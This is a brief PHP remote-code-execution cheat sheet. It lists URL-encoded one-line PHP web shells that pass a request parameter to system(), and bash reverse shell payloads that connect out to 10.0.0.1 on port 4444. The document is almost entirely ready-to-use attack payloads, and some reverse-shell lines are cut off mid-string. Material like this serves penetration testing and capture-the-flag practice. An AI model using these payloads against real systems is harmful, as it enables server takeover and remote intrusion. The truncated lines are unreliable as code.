# PHP RCE Cheat Sheet ### Web Shell ```shellscript <%3fphp+system($_['cmd']);%3f> <%3fphp+echo+system($_['cmd']);%3f> ``` We can access to `/?cmd=whoami`. ### Reverse Shell ```shellscript & /dev/tcp/10.0.0.1/4444 0>&1');?> & /dev/tcp/10.0.0.1/4444 0>&1"');?> <%3fphp+system('bash+-i+>%26+%2fdev%2ftcp%2f10.0.0.1%2f4444+0>%261');%3f> <%3fphp+system('bash+-c+"bash+-i+>%26+%2fdev%2ftcp%2f10.0.0.1%2f4444+0>%261"');%3f> ```